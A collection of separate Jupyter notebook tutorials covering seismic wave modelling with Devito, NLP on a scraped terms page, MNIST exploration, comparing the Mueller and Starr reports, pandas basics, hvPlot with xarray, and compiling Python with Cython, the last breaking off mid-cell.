$Q=25$ model") plt.subplot(1, 2, 2) plt.imshow(np.transpose(u.data[1,:,:] / amax_Q100), cmap="seismic", vmin=-1, vmax=+1, extent=plt_extent) plt.colorbar(orientation='horizontal', label='Amplitude') plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'black', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot(src.coordinates.data[:, 0], src.coordinates.data[:, 1], \ 'red', linestyle='None', marker='*', markersize=15, label="Source") plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("Data for $Q=100$ model") plt.tight_layout() None ``` ## Plot the computed Q=25 and Q=100 receiver gathers ``` # NBVAL_IGNORE_OUTPUT # Plot the two receiver gathers, normalized to Q=100 (the larger amplitude) amax_Q25 = 0.1 * np.max(np.abs(recQ25.data[:])) amax_Q100 = 0.1 * np.max(np.abs(rec.data[:])) print("amax Q= 25; %12.6f" % (amax_Q25)) print("amax Q=100; %12.6f" % (amax_Q100)) plt.figure(figsize=(12,8)) plt.subplot(1, 2, 1) plt.imshow(recQ25.data[:,:] / amax_Q100, cmap="seismic", vmin=-1, vmax=+1, extent=plt_extent, aspect="auto") plt.colorbar(orientation='horizontal', label='Amplitude') plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("Receiver gather for $Q=25$ model") plt.subplot(1, 2, 2) plt.imshow(rec.data[:,:] / amax_Q100, cmap="seismic", vmin=-1, vmax=+1, extent=plt_extent, aspect="auto") plt.colorbar(orientation='horizontal', label='Amplitude') plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("Receiver gather for $Q=100$ model") plt.tight_layout() None ``` ## Show the output from Devito solving for the stencil Note this takes a **long time** ... about 50 seconds, but obviates the need to solve for the time update expression as we did above. If you would like to see the time update equation as generated by Devito symbolic optimization, uncomment the lines for the solve below. ``` # NBVAL_IGNORE_OUTPUT # Define the partial_differential equation # Note the backward shifted time derivative is obtained via u.dt(x0=t-0.5*t.spacing) pde = (b / m**2) * (wOverQ_100 * u.dt(x0=t-0.5*t.spacing) + u.dt2) -\ (b * u.dx(x0=x+0.5*x.spacing)).dx(x0=x-0.5*x.spacing) -\ (b * u.dz(x0=z+0.5*z.spacing)).dz(x0=z-0.5*z.spacing) # Uncomment the next 5 lines to see the equation as generated by Devito # t1 = timer() # stencil = Eq(u.forward, solve(pde, u.forward)) # t2 = timer() # print("solve ran in %.4f seconds." % (t2-t1)) # stencil ``` ## Discussion This concludes the implementation of the nonlinear forward operator. This series continues in the next notebook that describes the implementation of the Jacobian linearized forward and adjoint operators. [sa_02_iso_implementation2.ipynb](sa_02_iso_implementation2.ipynb) ## References - **A nonreflecting boundary condition for discrete acoustic and elastic wave equations** (1985) <br>Charles Cerjan, Dan Kosloff, Ronnie Kosloff, and Moshe Resheq <br> Geophysics, Vol. 50, No. 4 <br>https://library.seg.org/doi/pdfplus/10.1190/segam2016-13878451.1 - **Generation of Finite Difference Formulas on Arbitrarily Spaced Grids** (1988) <br>Bengt Fornberg <br>Mathematics of Computation, Vol. 51, No. 184 <br>http://dx.doi.org/10.1090/S0025-5718-1988-0935077-0 <br>https://web.njit.edu/~jiang/math712/fornberg.pdf - **Self-adjoint, energy-conserving second-order pseudoacoustic systems for VTI and TTI media for reverse time migration and full-waveform inversion** (2016) <br>Kenneth Bube, John Washbourne, Raymond Ergas, and Tamas Nemeth <br>SEG Technical Program Expanded Abstracts <br>https://library.seg.org/doi/10.1190/segam2016-13878451.1
github_jupyter
<font color='green'> <h1> <b> Web Scraping </b> </h1> </font> <br /> <font color='black'> <h3> Working on Textual data to understand the overall conditions related to the company. </h3> </font> ``` import requests import nltk nltk.download('wordnet') from nltk.stem import WordNetLemmatizer from nltk.sentiment.vader import SentimentIntensityAnalyzer from bs4 import BeautifulSoup import numpy as np import pandas as pd import seaborn as sns import matplotlib.pyplot as plt %matplotlib inline import random from wordcloud import WordCloud from html.parser import HTMLParser import bs4 as bs import urllib.request import re import string r=requests.get('https://www.stericycle.com/terms-and-conditions') r.encoding = 'utf-8' html = r.text print(html[:500]) soup = BeautifulSoup(html) text = soup.get_text() len(text) text=text[17300:31000] text_nopunct='' text_nopunct= "".join([char for char in text if char not in string.punctuation]) len(text_nopunct) text_nopunct[500:1500] text_nopunct=text_nopunct.strip('\n') text_nopunct=text_nopunct.strip('\n\n') text_nopunct=text_nopunct.strip('\n\n\n') text_nopunct[500:1500] tokenizer = nltk.tokenize.RegexpTokenizer('\w+') tokens = tokenizer.tokenize(text_nopunct) len(tokens) print(tokens[0:20]) words = [] for word in tokens: words.append(word.lower()) print(words[0:50]) stopwords = nltk.corpus.stopwords.words('english') words_new = [] for word in words: if word not in stopwords: words_new.append(word) len(words_new) from nltk.stem import WordNetLemmatizer wn = WordNetLemmatizer() lem_words=[] for word in words_new: word=wn.lemmatize(word) lem_words.append(word) len(lem_words) same=0 diff=0 for i in range(0,161): if(lem_words[i]==words_new[i]): same=same+1 elif(lem_words[i]!=words_new[i]): diff=diff+1 print('Number of words Lemmatized=', diff) print('Number of words not Lemmatized=', same) #The frequency distribution of the words freq_dist = nltk.FreqDist(lem_words) #Frequency Distribution Plot plt.subplots(figsize=(10,6)) freq_dist.plot(30) #converting into string res=' '.join([i for i in lem_words if not i.isdigit()]) plt.subplots(figsize=(12,8)) wordcloud = WordCloud( background_color='red', max_words=80, width=1000, height=800 ).generate(res) plt.imshow(wordcloud) plt.title('Stericycle (100 words)') plt.axis('off') plt.show() plt.subplots(figsize=(12,8)) wordcloud = WordCloud( background_color='red', max_words=120, width=1000, height=800 ).generate(res) plt.imshow(wordcloud) plt.title('Stericycle (200 words)') plt.axis('off') plt.show() ```
github_jupyter
## Image Classification Problems - Warm-Up In the following set of tutorials, we will focus on a particular class of problems, namely supervised classification, as a typical example for machine learning application use cases. Generally, in classification the task is to assign data items to a fixed set of categories, or in other words classes. While this might sound like an easy task for trivial problems such as deciding if someone is of legal age given their birthday, other classification problems are much harder. Consider for example the problem of identifying in a gray-scale satellite image, what land-cover type, e.g. road, house, field, etc., one can see. There are a number of challenges involved in this problem, objects may have different shapes, might be partially covered by cloud shadows or simply have varying colors. Writing a rule-based algorithm for such a problem is close to impossible. Therefore, we would want to employ a data-driven approach instead and stochastically infer reasonable respresentations for each data-item and class from manually annotated examples (the supervisor). This approach is so flexible that it can be mapped to a large number of application scenarios by providing input data with its corresponding encoded pattern labels (i.e. the annotations). As part of this tutorial, we will study one examplery use case - image classification. For a number of images, we will predict, what object is depicted in it. For teaching purposes, we will use the battle-test MNIST database [1]. It contains 70.000 images with 28x28 pixels of hand-written digits, collected by US-American National Institute of Standard and Technology. The classification task is to decide what digit can be seen in each of these images. You should notice throughout the tutorial session that the presented approaches can be easily transferred to other application domains, like for example the initially presented satellite image scenario. ### Setup In line with the presented tutorial series, we will make use of the Python programming language and a number of additionally downloadable packages. Some of you might already be familiar with these, so you might want to skip ahead to the next section. For those of you that are new to Python, you might an enjoy a (very) brief overview of the packages, we are going to use: * **h5py [3]** - a module that allows us to process HDF5 [2] files. * **numpy [4]** - a library for efficient manipulation of multi-dimensional arrays, matrices and mathemical operations. * **matplotlib [5]** - a plotting library, which we will use to create 2D plots and display images. ``` import h5py import numpy as np import matplotlib.pyplot as plt plt.style.use('seaborn') ``` ### Loading the Data The entire MNIST database of images including labels is approximately 220 MB in size. During the tutorials you are going to work on the entire dataset. For pratical purposes we have stored the images and labels in an HDF5 file. This is a specifialized data format that originates from the area of high-performance computing (HPC). It is highly optimized for scenarios in which large amounts of data are read and write from disk (potentially in parallel). HDF5 is particular suited for (semi-)structured data, like vector, matrices or other multi-dimensional arrays. Moreover, HDF5 also provides advanced compressing algorithms reducing the effective size of the MNIST database on disk to roughly 18 MB. At the same time the access to HDF5 files is straight-forward. Within each HDF5 file there is a structure akin to a file-system and its pathes under which data can be stored, respectively read. In our HDF5 file the images of the MNIST dataset can be found in the path (it is actually called a dataset) 'data' and the labels in the dataset 'labels'. ``` def load_data(path='mnist.h5'): """ Loads a dataset and its supervisor labels from the HDF5 file specified by the path. It is assumed that the HDF5 dataset containing the data is called 'data' and the labels are called 'labels'. Parameters ---------- path : str, optional The absolute or relative path to the HDF5 file, defaults to mnist.h5. Returns ------- data_and_labels : tuple(np.array[samples, width, height], np.array[samples]) a tuple with two numpy array containing the data and labels """ with h5py.File(path, 'r') as handle: return np.array(handle['/data']), np.array(handle['/labels']) data, labels = load_data() data.shape, labels.shape ``` ### Getting Familiar with the MNIST Dataset Let's have a look on some of the images, to get a feel for what they look like. Each of them has only a single color gray channel, i.e. is black-and-white. ``` def show_examples(data, width=10, height=6): """ Displays a number of example images from a given dataset. The images are arranged in a rectangular grid with a specified width and height. Parameters ---------- data : np.array[samples, width, height] The dataset containing the images. width : int, optional How wide the rectangular image grid shall be, defaults to ten. height : int, optional How high the rectangular image grid shall, defaults to six. """ index = 0 figure, axes = plt.subplots(height, width, figsize=(16, 9), sharex=True, sharey=True) for h in range(height): for w in range(width): axis = axes[h][w] axis.grid(False) axis.imshow(data[index], cmap='gist_gray') index += 1 plt.show() show_examples(data) ``` ### A Slightly Deeper Look In data-driven application use cases it is usually beneficial to get understanding about the properties of the utilized datasets. This is not only necessary to preprocess the data properly, e.g. clean missing values or normalize each of the feature axis to be on the same scale, but also to be able to fine-tune the machine learning algorithm parameters. The MNIST dataset is fortunately nicely preprocessed and each feature, i.e. the pixel values, are all within the same range. Therefore, we do not need for the sake of this tutorial to perform any further preprocessing. However, it would be good see whether some of the patterns, meaning the digits, are underrepresented. If so, this would not only mean that we should pay close attention, how we evaluate the model, but also, how effective each of the classes may be learned. Let's have a look. ``` def count_digits(labels): """ Counts how often each of the individual labels, i.e. each digit, occurs in the dataset. Parameters ---------- labels : np.array[samples] The labels for each data item. Returns ------- counts : dict[unique_classes -> int] A mapping between each unique class label and its absolute occurrence count. """ return dict(enumerate(np.bincount(labels))) count_digits(labels) ``` All of the classes seem to be more or less evenly distributed. We can only observe a slight bias towards the digits *1*, *3* and *7* as well as a slight underrepresentation of number *5*. Including more samples depicting *1* and *7* seems like a logical precaution due to their similarity. In practice, we must later carefully investigate how much this skew affects our machine learning model performance. Since all of the images of the digits in the MNIST database are centered and only have a single color channel, we should be able to compute an "average" digits for each of them. ``` def average_images(data, labels): """ Averages all the data items that are of the same class and returns the resulting 'mean items'. Parameters ---------- data : np.array[samples, width, height] The dataset containing the images. labels : np.array[samples] The corresponding labels for each data item. Returns ------- mean_items : np.array[unique_classes, width, height] The 'mean items' for each unique class in the labels """ classes = np.unique(labels).shape[0] averages = np.zeros((classes, data.shape[1], data.shape[2],)) for digit in range(classes): averages[digit] = data[labels == digit].mean(axis=0) return averages show_examples(average_images(data, labels), width=5, height=2) ``` The average numbers still clearly resemble their corresponding individuals. Some of them are a little more fuzzy than others so, e.g. *4* or *9*, highlighting the sample variance and the necessity for a stochastic learning approach. Moreover, one can also clearly see that the digits are American-styled, e.g. missing diagonal slash for the *1* or cross bar for the *7*. ### References [1] **The MNIST database of handwritten digits**, *Yann LeCun, Corinna Cortes, Christopher J. C. Burges*, [external link](http://yann.lecun.com/exdb/mnist/). [2] **Hierarchical Data Format, version 5**, *The HDF Group*, [external link](http://www.hdfgroup.org/HDF5/). [3] **HDF5 for Python**, *Andrew Collette*, O'Reilly, (2008), [documentation, external link](http://docs.h5py.org/en/latest/index.html). [4] **A guide to NumPy**, *Travis E, Oliphant*, Trelgol Publishing, (2006), [documentation, external link](https://docs.scipy.org/doc/numpy-1.14.0/). [5] **Matplotlib: A 2D graphics environment**, *John D. Hunter, J. D.*, Computing In Science & Engineering, vol. 9, issue 3, 90-95, (2007), [documentation, external link](https://matplotlib.org/).
github_jupyter
``` # Starr Report copied from # https://www.washingtonpost.com/wp-srv/politics/special/clinton/icreport/srprintable.htm !ls import pdfminer import re import scattertext as st import pandas as pd from pdfminer import pdfparser parser = pdfparser.PDFParser(open('mueller-report.pdf', 'rb')) #From http://stanford.edu/~mgorkove/cgi-bin/rpython_tutorials/Using%20Python%20to%20Convert%20PDFs%20to%20Text%20Files.php from io import StringIO from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter from pdfminer.converter import TextConverter from pdfminer.layout import LAParams from pdfminer.pdfpage import PDFPage import os import sys, getopt #converts pdf, returns its text content as a string def convert(fname, pages=None): if not pages: pagenums = set() else: pagenums = set(pages) output = StringIO() manager = PDFResourceManager() converter = TextConverter(manager, output, laparams=LAParams()) interpreter = PDFPageInterpreter(manager, converter) infile = open(fname, 'rb') for page in PDFPage.get_pages(infile, pagenums): interpreter.process_page(page) infile.close() converter.close() text = output.getvalue() output.close return text mueller_report_raw_text = convert('mueller-report.pdf') open('mueller_report.txt', 'w').write(mueller_report_raw_text) starr_report_raw = open('starr_report.txt').read() def is_proper_paragraph(paragraph): return len(paragraph) > 200 and not re.match('^\d', paragraph) and '...................' not in paragraph mueller_paragraphs = [paragraph.strip() for paragraph in mueller_report_raw_text.split('\n\n') if is_proper_paragraph(paragraph)] mueller_df = pd.DataFrame({'text': mueller_paragraphs}) mueller_df['category'] = 'Mueller' starr_report_paragraphs = [paragraph.strip() for paragraph in starr_report_raw.split('\n\n') if is_proper_paragraph(paragraph)] starr_df = pd.DataFrame({'text': starr_report_paragraphs}) starr_df['category'] = 'Starr' full_df = pd.concat([mueller_df, starr_df]) full_df['parse'] = full_df.text.apply(st.whitespace_nlp_with_sentences) corpus = (st.CorpusFromParsedDocuments(full_df, category_col='category', parsed_col='parse').build().get_unigram_corpus()) term_scorer = st.CohensD(corpus).set_categories('Mueller', ['Starr']) html = st.produce_scattertext_explorer( corpus, category='Mueller', not_category_name='Starr', term_scorer=st.RankDifference(), transform=st.Scalers.dense_rank, use_full_doc=True ) file_name = 'mueller_vs_starr.html' open(file_name, 'wb').write(html.encode('utf-8')) ```
github_jupyter
# Pandas In this tutorial we will learn to work with tables of data with the `pandas` Python package. Pandas is an industry standard analysis package for data science, so it has many features and is actively being updated and supported (full documentation [here](https://pandas.pydata.org/pandas-docs/stable/)). ## Overview Pandas has two main data structures that it uses to store tables of data, the **Series** and the **DataFrame**. - The **Series** represents a single column of data - The **DataFrame** is a collention of **Series** columns that make a table Let's start by exploring the DataFrame in pandas! ``` # Pandas is commonly aliased as pd import pandas as pd ``` ## Creating DataFrames In the `dict` chapter, we saw that dictionaries can be used to represent tables of data. As you may expect, DataFrames can be created directly from dictionaries! ``` # Daily coffee consumption over 4 weeks coffees = { 'Week': ['Sep 2', 'Sep 9', 'Sep 16', 'Sep 23'], 'Monday': [2, 1, 2, 3], 'Tuesday': [1, 2, 1, 2], 'Wednesday': [1, 1, 2, 1], 'Thursday': [1, 2, 1, 2], 'Friday': [1, 1, 3, 3] } df = pd.DataFrame(coffees) print(type(df)) df ``` We get see the column names using the `.columns` attribute. ``` df.columns ``` ## Slicing and Indexing Pandas gives a few ways to find your data in a **DataFrame**. - `[]` raw indexing by *column* like we've seen in `dict` - `.loc[]` **loc**ate *row* by name - `.iloc[]` **loc**ate *row* by numerical **i**ndex Let's try each of these on a subset of our `exoplanets` DataFrame. ``` df['Monday'] # try locating a row by its week df.loc['Sep 2'] ``` Uh oh, we didn't tell pandas which of the columns to use as our `Index`. The `Index` is an optional unique identifier of a rows, like a *name*, *ID*, or in our case, the *week*. Let's add an `Index` to our DataFrame. ``` df = df.set_index('Week') df.head() ``` Now we can use `.loc[]` to find rows by their Index name! ``` df.loc['Sep 2'] ``` Finally, we can also specify a rows from our DataFrame by its *numerical* index using `.iloc[]`. ``` # Get first row in the DataFrame df.iloc[0] ``` ## DataFrame methods Now let's read in an example dataset to learn about a few other useful DataFrame methods. ``` exoplanets = pd.read_csv("https://github.com/mwaskom/seaborn-data/raw/master/planets.csv") ``` We can check that `pandas` read the table in as a **DataFrame**. ``` type(exoplanets) ``` The `DataFrame.info()` method can tell us about the contents of our table. ``` print(exoplanets.info()) ``` In the above description, we get the total number of rows (the **RangeIndex**), and the number of non-null entries in each of the columns. We can get a sense for what the table looks like by printing the first few rows with the `DataFrame.head(num_rows)` method. You can specify a number of rows to `.head()`, otherwise it shows the first 5 by default. ``` exoplanets.head() ``` Similarly, we can print rows from the bottom of the table with the `.tail(num_rows)` method. Here we are printing the bottom 2 rows. ``` exoplanets.tail(2) ``` ## Null data Dealing with missing data is a major strength of `pandas`. Pandas fills in missing data with a value of `NaN`, but these can be challenging to deal with because many math operations are amiguous or undefined on `NaN` values. Let's get a list of where the values are in our DataFrame are missing with `.isnull()`. This will give a DataFrame of `bool` with whether or not each entry is null. Below, we use `.tail()` to just print the last 5 rows. ``` exoplanets.isnull().tail() ``` To get a summary of how many `NaN`s are in each column, we can use the `.sum()` method (recall that `bool` values in Python are equivalent to 0 and 1 in Python and can be summed). ``` exoplanets.isnull().sum() ``` Here we've converted each null entry to `True`, then summed each of the boolean columns. Since `False == 0`, we get a count of the `True == 1` (in this case the null valued) entries in each column. To get rid of these null values, we have a few options. Sometimes we want to completely drop all rows with missing data and we can do this with `dropna()`. ``` exo = exoplanets.dropna() exo.info() ``` Now we have 498 rows without missing values remaining. Let's verify this with the sum trick we saw above. ``` exo.isnull().sum() ``` If instead we want to fill the null values with some default value, we can use the `.fillna()` method. ``` exo_filled = exoplanets.fillna(0) exo_filled.tail() exo_filled.isnull().sum() ``` ## And More Often we want to select data from a table on some condition. Say we want all of the rows where the detection method was *microlensing*, we could do: ``` exoplanets[exoplanets['method'] == 'Microlensing'] ``` Say we want all exoplanets detected between 2009 and 2011. We can do this by combining two boolean expressions with a `&`. ``` exoplanets[(exoplanets['year'] >= 2009) & (exoplanets['year'] <= 2011)].info() ``` Pandas also has a useful summary method which gives statistics on each of the columns called `.describe()`. This can be a quick way to see if the mimima, maxima and means of each column are what you expect. ``` exoplanets.describe() ``` Finally, we can plot a dataframe directly with the `.plot()` method. This method uses `pyplot` from `matplotlib` and accepts most of the same arguments that you would pass to `matplotlib.pyplot.plot()`. The conveniece of plotting directly from a DataFrame is being able to specify the names of columns as the x and y axes. ``` exoplanets.plot(kind='scatter', x='mass', y='orbital_period', title='Orbital Period vs Mass') ``` ## Practice We will read in the fuel economy dataset, **mpg** from https://github.com/mwaskom/seaborn-data below. ``` mpg = pd.read_csv("https://github.com/mwaskom/seaborn-data/raw/master/mpg.csv") ``` 1. Use the `.info()`, `.describe()`, and `.head()` methods to get acquainted with the dataset - are there null values for any columns? What is the minimum and maximum number of cylinders of cars in the dataset? 2. If any rows have null values, use `.dropna()` to remove those rows 3. Create a new variable, `mpg4` with only the 4-cylinder engine cars 4. Using the 4-cylinder car DataFrame, make a scatter plot of the *mpg* (fuel economy) vs *horsepower* 5. Plot a histogram (you can do this with `.plot(kind='hist)`) of the *mpg* for only the cars whose *origin* is "usa" ``` # Answer the above problems here! ```
github_jupyter
hvPlot provides one API to explore data of many different types. Previous sections have exclusively worked with tabular data stored in pandas (or pandas-like) DataFrames. The other most common type of data are n-dimensional arrays. hvPlot aims to eventually support different array libraries but for now focuses on [xarray](http://xarray.pydata.org/en/stable/). XArray provides a convenient and very powerful wrapper to label the axis and coordinates of multi-dimensional (n-D) arrays. This user guide will cover how to leverage ``xarray`` and ``hvplot`` to visualize and explore data of different dimensionality ranging from simple 1D data, to 2D image-like data, to multi-dimensional cubes of data. For these examples we’ll use the North American air temperature dataset: ``` import xarray as xr import hvplot.xarray # noqa air_ds = xr.tutorial.open_dataset('air_temperature').load() air = air_ds.air air_ds ``` ## 1D Plots Selecting the data at a particular lat/lon coordinate we get a 1D dataset of air temperatures over time: ``` air1d = air.sel(lat=40, lon=285) air1d.hvplot() ``` Notice how the axes are already appropriately labeled, because xarray stores the metadata required. We can also further subselect the data and use `*` to overlay plots: ``` air1d_sel = air1d.sel(time='2013-01') air1d_sel.hvplot(color='purple') * air1d_sel.hvplot.scatter(marker='o', color='blue', size=15) air.lat ``` ### Selecting multiple If we select multiple coordinates along one axis and plot a chart type, the data will automatically be split by the coordinate: ``` air.sel(lat=[20, 40, 60], lon=285).hvplot.line() ``` To plot a different relationship we can explicitly request to display the latitude along the y-axis and use the ``by`` keyword to color each longitude (or 'lon') differently (note that this differs from the ``hue`` keyword xarray uses): ``` air.sel(time='2013-02-01 00:00', lon=[280, 285]).hvplot.line(y='lat', by='lon', legend='top_right') ``` ## 2D Plots By default the ``DataArray.hvplot()`` method generates an image if the data is two-dimensional. ``` air2d = air.sel(time='2013-06-01 12:00') air2d.hvplot(width=400) ``` Alternatively we can also plot the same data using the ``contour`` and ``contourf`` methods, which provide a ``levels`` argument to control the number of iso-contours to draw: ``` air2d.hvplot.contour(width=400, levels=20) + air2d.hvplot.contourf(width=400, levels=8) ``` ## n-D Plots If the data has more than two dimensions it will default to a histogram without providing it further hints: ``` air.hvplot() ``` However we can tell it to apply a ``groupby`` along a particular dimension, allowing us to explore the data as images along that dimension with a slider: ``` air.hvplot(groupby='time', width=500) ``` By default, for numeric types you'll get a slider and for non-numeric types you'll get a selector. Use ``widget_type`` and ``widget_location`` to control the look of the widget. To learn more about customizing widget behavior see [Widgets](Widgets.ipynb). ``` air.hvplot(groupby='time', width=600, widget_type='scrubber', widget_location='bottom') ``` If we pick a different, lower dimensional plot type (such as a 'line') it will automatically apply a groupby over the remaining dimensions: ``` air.hvplot.line(width=600) ``` ## Statistical plots Statistical plots such as histograms, kernel-density estimates, or violin and box-whisker plots aggregate the data across one or more of the coordinate dimensions. For instance, plotting a KDE provides a summary of all the air temperature values but we can, once again, use the ``by`` keyword to view each selected latitude (or 'lat') separately: ``` air.sel(lat=[25, 50, 75]).hvplot.kde('air', by='lat', alpha=0.5) ``` Using the ``by`` keyword we can break down the distribution of the air temperature across one or more variables: ``` air.hvplot.violin('air', by='lat', color='lat', cmap='Category20') ``` ## Rasterizing If you are plotting a large amount of data at once, you can consider using the hvPlot interface to [Datashader](http://datashader.org), which can be enabled simply by setting `rasterize=True`. Note that by declaring that the data should not be grouped by another coordinate variable, i.e. by setting `groupby=[]`, we can plot all the datapoints, showing us the spread of air temperatures in the dataset: ``` air.hvplot.scatter('time', groupby=[], rasterize=True) *\ air.mean(['lat', 'lon']).hvplot.line('time', color='indianred') ``` Here we also overlaid a non-datashaded line plot of the average temperature at each time. If you enable the appropriate hover tool, the overlaid data supports hovering and zooming even in a static export such as on a web server or in an email, while the raw-data plot has been aggregated spatially before it is sent to the browser, and thus it has only the fixed spatial binning available at that time. If you have a live Python process, the raw data will be aggregated each time you pan or zoom, letting you see the entire dataset regardless of size.
github_jupyter
**Notas para contenedor de docker:** Comando de docker para ejecución de la nota de forma local: nota: cambiar `<ruta a mi directorio>` por la ruta de directorio que se desea mapear a `/datos` dentro del contenedor de docker. ``` docker run --rm -v <ruta a mi directorio>:/datos --name jupyterlab_numerical -p 8888:8888 -p 8786:8786 -p 8787:8787 -d palmoreck/jupyterlab_numerical:1.1.0 ``` password para jupyterlab: `qwerty` Detener el contenedor de docker: ``` docker stop jupyterlab_numerical ``` Documentación de la imagen de docker `palmoreck/jupyterlab_numerical:1.1.0` en [liga](https://github.com/palmoreck/dockerfiles/tree/master/jupyterlab/numerical). --- Esta nota utiliza métodos vistos en [1.5.Integracion_numerica](https://github.com/ITAM-DS/analisis-numerico-computo-cientifico/blob/master/temas/I.computo_cientifico/1.5.Integracion_numerica.ipynb) Documentación de [cython](https://cython.org/): * [Basic Tutorial](https://cython.readthedocs.io/en/latest/src/tutorial/cython_tutorial.html) * [Source Files and Compilation](https://cython.readthedocs.io/en/latest/src/userguide/source_files_and_compilation.html) * [Compiling with a Jupyter Notebook](https://cython.readthedocs.io/en/latest/src/userguide/source_files_and_compilation.html#compiling-with-a-jupyter-notebook) **La siguiente celda muestra el modo de utilizar el comando magic de `%pip` para instalar paquetes desde jupyterlab.** Ver [liga](https://ipython.readthedocs.io/en/stable/interactive/magics.html#built-in-magic-commands) para magic commands. Instalamos cython: ``` %pip install -q --user cython ``` La siguiente celda reiniciará el kernel de **IPython** para cargar los paquetes instalados en la celda anterior. Dar **Ok** en el mensaje que salga y continuar con el contenido del notebook. ``` import IPython app = IPython.Application.instance() app.kernel.do_shutdown(True) ``` # Cython y el por qué compilar a código de máquina De las opciones más sencillas que tenemos a nuestra disposición para resolver bottlenecks en nuestro programa es hacer que nuestro código haga menos trabajo. ¿Cómo podemos hacer esto? <- compilando nuestro código a código de máquina para que el código en Python ejecute menos instrucciones. **¿Por qué puede ser lenta la ejecución de un bloque de código en Python (o en algún otro lenguaje tipo intérprete)?** La verificación de tipo de datos (si son `int`, `double` o `string`), los objetos temporales que se crean por tipo de dato (un objeto tipo `int` en Python tiene asociado un objeto de alto nivel con el que interactuamos pero que causa overhead) y las llamadas a funciones de alto nivel (por ejemplo las que ayudan a almacenar al objeto en memoria) son tres de las fuentes que hacen a Python (y a otro lenguaje tipo intérprete como `R` o `Matlab`) lento. También otras fuentes que responden la pregunta son: * Desde el punto de vista de la memoria de la máquina, el número de referencias a un objeto y las copias entre objetos. * No es posible vectorizar un cálculo sin el uso de extensiones (por ejemplo paquetes como `numpy`). Un paquete para resolver lo anterior es Cython que requiere que escribamos en un lenguaje híbrido entre Python y C. Si bien a l@s integrantes de un equipo de desarrollo que no saben C éste cambio reducirá la velocidad de desarrollo, en la práctica si se tiene un bottleneck que no ha podido resolverse con herramientas como el cómputo en paralelo o vectorización, se recomienda utilizar Cython para regiones pequeñas del código y resolver el bottleneck del programa. Cython es un compilador que convierte *type-annotated Python* y *C like* (instrucciones escritas en Python pero en una forma tipo lenguaje C) en un módulo compilado que funciona como una extensión de Python. Este módulo puede ser importado como un módulo regular de Python utilizando `import`. Además Cython tiene ya un buen tiempo en la comunidad (2007 aprox.), es altamente usado y es de las herramientas preferidas para código tipo *CPU-bound* (un gran porcentaje del código es uso de CPU vs uso de memoria o I/O). También soporta a la [API OpenMP](https://www.openmp.org/) que veremos en el capítulo de cómputo en paralelo para aprovechar los múltiples cores o CPU's de una máquina. Para ver más historia de Cython ir a la referencia 1. de esta nota o a la [liga](https://en.wikipedia.org/wiki/Cython). # ¿Qué tipo de ganancias en velocidad podemos esperar al usar Cython? * Código en el que se tengan muchos loops (por ejemplo ciclos `for`) en los que se realizan operaciones matemáticas típicamente no vectorizadas o que no pueden vectorizarse*. Esto es, códigos en los que las instrucciones son básicamente sólo Python sin utilizar paquetes externos. Además, si en el ciclo las variables no cambian de su tipo (por ejemplo de `int` a `float`) entonces es una blanco perfecto para ganancia en velocidad al compilar a código de máquina. *Si tu código de Python llama a operaciones vectorizadas vía `numpy` podría ser que no se ejecute más rápido tu código después de compilarlo. * No esperamos tener un *speedup* después de compilar para llamadas a librerías externas (por ejemplo a expresiones regulares, operaciones con `string`s o a una base de datos). Programas que tengan alta carga de I/O también es poco probable que muestren ganancias significativas. En general es poco probable que tu código compilado se ejecute más rápido que un código en C "bien aceitado" y también es poco probable que se ejecute más lento. Es muy posible que el código C generado desde tu Python pueda alcanzar las velocidades de un código escrito en C, a menos que la persona que programó en C tenga un gran conocimiento de formas de hacer que el código de C se ajuste a la arquitectura de la máquina sobre la que se ejecutan los códigos. **No olvidar:** es importante fijar de forma aproximada el tiempo objetivo que se desea alcanzar para un código que escribamos. Si bien el perfilamiento y la compilación son herramientas para resolver los bottlenecks, debemos tomar en cuenta el tiempo objetivo fijado y ser práctic@s en el desarrollo, no podemos por siempre estar optimizando nuestro código. # Ejemplo Cython puede utilizarse vía un script `setup.py` que compila un módulo pero también puede utilizarse en `IPython` vía un comando `magic`. ``` import math import time from scipy.integrate import quad ``` ## Vía un script `setup.py` Para este caso requerimos tres archivos: 1) El código escrito en Python que será compilado en un archivo con extensión `.pyx`. 2) Un archivo `setup.py` que contiene las instrucciones para llamar a Cython y cree el módulo compilado. 3) El código escrito en Python que importará el módulo compilado (puede pensarse como nuestro `main`). 1) Función a compilar en un archivo `.pyx`: ``` %%file Rcf_cython.pyx def Rcf(f,a,b,n): #Rcf: rectángulo compuesto para f """ Compute numerical approximation using rectangle or mid-point method in an interval. Nodes are generated via formula: x_i = a+(i+1/2)h_hat for i=0,1,...,n-1 and h_hat=(b-a)/n Args: f (lambda expression): lambda expression of integrand a (int): left point of interval b (int): right point of interval n (int): number of subintervals Returns: Rcf (float) """ h_hat=(b-a)/n nodes=[a+(i+1/2)*h_hat for i in range(0,n)] sum_res=0 for node in nodes: sum_res=sum_res+f(node) return h_hat*sum_res ``` 2) Archivo `setup.py` que contiene las instrucciones para el build: ``` %%file setup.py from distutils.core import setup from distutils.extension import Extension from Cython.Distutils import build_ext setup(cmdclass = {'build_ext': build_ext}, ext_modules = [Extension("Rcf_compiled", ["Rcf_cython.pyx"])] ) ``` Compilar desde la línea de comandos: ``` %%bash python3 setup.py build_ext --inplace #inplace para compilar el módulo en el directorio #actual ``` **Notas:** * La compilación debe hacerse cada vez que se modifica el código de la función `Rcf` del archivo `Rcf_cython.pyx` o cambia el `setup.py`. * Obsérvese en el directorio donde se encuentra la nota que se generó un archivo `Rcf_cython.c`. 3) Importar módulo compilado y ejecutarlo: ``` f=lambda x: math.exp(-x**2) #using math library import Rcf_compiled n=10**6 start_time = time.time() aprox=Rcf_compiled.Rcf(f,0,1,n) end_time = time.time() aprox secs = end_time-start_time print("Rcf tomó",secs,"segundos" ) ``` **Recuérdese** revisar el error relativo: ``` def err_relativo(aprox, obj): return math.fabs(aprox-obj)/math.fabs(obj) #obsérvese el uso de la librería math obj, err = quad(f, 0, 1) err_relativo(aprox,obj) ``` **Ejercicio:** investigar por qué se tiene un error relativo del orden de $10^{-7}$ y no de mayor precisión como se verá más abajo con el archivo `Rcf_cython2.pyx`. ``` %timeit -n 5 -r 10 